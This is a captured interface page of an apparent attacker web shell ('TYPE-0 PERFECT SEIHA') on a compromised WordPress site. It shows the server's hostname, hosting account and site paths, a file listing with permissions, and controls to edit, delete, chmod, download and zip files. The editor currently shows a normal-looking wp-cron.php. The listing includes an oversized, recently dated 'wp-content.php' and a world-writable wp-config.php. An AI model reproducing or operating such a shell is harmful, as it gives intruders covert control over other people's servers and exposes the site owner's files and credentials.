TYPE-0 PERFECT SEIHA
Server Info:
Linux sv152.xbiz.ne.jp 5.4.0-216-bet02-generic #236-Ubuntu SMP Thu Oct 2 15:14:18 JST 2025 x86_64
Software:
Apache
User:
xb531532
Crot
Crot File
Crot Dir
Crot Command
[LockSelf]
[HOME]
home
xb531532
kobehoumu.jp
public_html
Show Hidden Files
Edit File: /home/xb531532/kobehoumu.jp/public_html/wp-cron.php
<?php /** * A pseudo-cron daemon for scheduling WordPress tasks. * * WP-Cron is triggered when the site receives a visit. In the scenario * where a site may not receive enough visits to execute scheduled tasks * in a timely manner, this file can be called directly or via a server * cron daemon for X number of times. * * Defining DISABLE_WP_CRON as true and calling this file directly are * mutually exclusive and the latter does not rely on the former to work. * * The HTTP request to this file will not slow down the visitor who happens to * visit when a scheduled cron event runs. * * @package WordPress */ ignore_user_abort( true ); /* Don't make the request block till we finish, if possible. */ if ( function_exists( 'fastcgi_finish_request' ) && version_compare( phpversion(), '7.0.16', '>=' ) ) { if ( ! headers_sent() ) { header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' ); header( 'Cache-Control: no-cache, must-revalidate, max-age=0' ); } fastcgi_finish_request(); } if ( ! empty( $_POST ) || defined( 'DOING_AJAX' ) || defined( 'DOING_CRON' ) ) { die(); } /** * Tell WordPress we are doing the cron task. * * @var bool */ define( 'DOING_CRON', true ); if ( ! defined( 'ABSPATH' ) ) { /** Set up WordPress environment */ require_once __DIR__ . '/wp-load.php'; } /** * Retrieves the cron lock. * * Returns the uncached `doing_cron` transient. * * @ignore * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @return string|false Value of the `doing_cron` transient, 0|false otherwise. */ function _get_cron_lock() { global $wpdb; $value = 0; if ( wp_using_ext_object_cache() ) { /* * Skip local cache and force re-fetch of doing_cron transient * in case another process updated the cache. */ $value = wp_cache_get( 'doing_cron', 'transient', true ); } else { $row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) ); if ( is_object( $row ) ) { $value = $row->option_value; } } return $value; } $crons = wp_get_ready_cron_jobs(); if ( empty( $crons ) ) { die(); } $gmt_time = microtime( true ); // The cron lock: a unix timestamp from when the cron was spawned. $doing_cron_transient = get_transient( 'doing_cron' ); // Use global $doing_wp_cron lock, otherwise use the GET lock. If no lock, try to grab a new lock. if ( empty( $doing_wp_cron ) ) { if ( empty( $_GET['doing_wp_cron'] ) ) { // Called from external script/job. Try setting a lock. if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) ) { return; } $doing_wp_cron = sprintf( '%.22F', microtime( true ) ); $doing_cron_transient = $doing_wp_cron; set_transient( 'doing_cron', $doing_wp_cron ); } else { $doing_wp_cron = $_GET['doing_wp_cron']; } } /* * The cron lock (a unix timestamp set when the cron was spawned), * must match $doing_wp_cron (the "key"). */ if ( $doing_cron_transient !== $doing_wp_cron ) { return; } foreach ( $crons as $timestamp => $cronhooks ) { if ( $timestamp > $gmt_time ) { break; } foreach ( $cronhooks as $hook => $keys ) { foreach ( $keys as $k => $v ) { $schedule = $v['schedule']; if ( $schedule ) { wp_reschedule_event( $timestamp, $schedule, $hook, $v['args'] ); } wp_unschedule_event( $timestamp, $hook, $v['args'] ); /** * Fires scheduled events. * * @ignore * @since 2.1.0 * * @param string $hook Name of the hook that was scheduled to be fired. * @param array $args The arguments to be passed to the hook. */ do_action_ref_array( $hook, $v['args'] ); // If the hook ran too long and another cron process stole the lock, quit. if ( _get_cron_lock() !== $doing_wp_cron ) { return; } } } } if ( _get_cron_lock() === $doing_wp_cron ) { delete_transient( 'doing_cron' ); } die();
Crotin
Name
Size
Permissions
Modified
User/Group
wp-config-sample.php
4068
0644
2022-03-11 06:57:07
xb531532/members
readme.html
7346
0644
2025-10-01 06:37:15
xb531532/members
license.txt
19915
0644
2022-03-11 06:57:07
xb531532/members
wp-settings.php
22297
0604
2022-01-14 05:34:07
xb531532/members
wp-load.php
3900
0604
2022-01-14 05:34:08
xb531532/members
wp-signup.php
31693
0604
2022-01-14 05:34:08
xb531532/members
wp-login.php
47146
0604
2025-04-28 03:27:00
xb531532/members
wp-comments-post.php
2328
0604
2022-01-14 05:34:08
xb531532/members
wp-activate.php
7165
0604
2022-01-14 05:34:08
xb531532/members
wp-trackback.php
4816
0644
2022-10-18 06:14:17
xb531532/members
wp-cron.php
3939
0604
2022-01-14 05:34:08
xb531532/members
xmlrpc.php
3236
0604
2022-01-14 05:34:09
xb531532/members
wp-mail.php
8454
0644
2022-10-18 06:14:17
xb531532/members
wp-links-opml.php
2496
0604
2022-01-14 05:34:09
xb531532/members
wp-blog-header.php
351
0604
2022-01-14 05:34:09
xb531532/members
index.php
405
0604
2022-01-14 05:34:09
xb531532/members
wp-content
-
0705
2025-12-27 00:10:03
xb531532/members
wp-includes
-
0705
2025-12-27 00:10:04
xb531532/members
wp-admin
-
0705
2025-12-27 00:10:04
xb531532/members
wp-config.php
4285
0666
2022-01-14 05:46:04
xb531532/members
favicon.ico
15086
0604
2022-01-31 14:38:21
xb531532/members
BingSiteAuth.xml
85
0604
2022-01-31 14:49:26
xb531532/members
wp-content.php
194679
0644
2025-12-27 00:10:03
xb531532/members
NGANU
Rename
Hapus
Chmod
Chown
Touch
Zip
Unzip
Download
Crotin